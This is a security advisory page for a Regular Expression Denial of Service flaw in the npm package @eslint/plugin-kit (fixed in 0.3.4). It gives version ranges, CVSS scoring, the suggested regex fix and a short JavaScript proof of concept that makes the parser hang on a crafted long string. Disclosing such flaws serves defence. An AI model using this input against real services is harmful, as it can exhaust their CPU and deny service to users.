Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS14ZmZtLWc1dzgtcXZnN84ABKSM

Low CVSS: 2.3
Permalink JSON

@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser

Affected Packages Affected Versions Fixed Versions
npm:@eslint/plugin-kit < 0.3.4 0.3.4
0 Dependent packages
0 Dependent repositories
88,775,068 Downloads last month

Affected Version Ranges

All affected versions

0.1.0, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.3.1, 0.3.2, 0.3.3

All unaffected versions

0.3.4

Summary

The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.

Details

The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].

PoC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

const str = `${"A".repeat(1000000)}?: 1 B: 2`;

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")

// run `npm i @eslint/[email protected]` and `node attack.js`
// then the program will stuck forever with high CPU usage

Impact

This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

References:

Identifiers

GHSA-xffm-g5w8-qvg7

Risk

Severity

Low

CVSS

CVSS Score: 2.3

CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/eslint/rewrite

Date and time

Published

11 days ago

Updated

1 day ago

API

JSON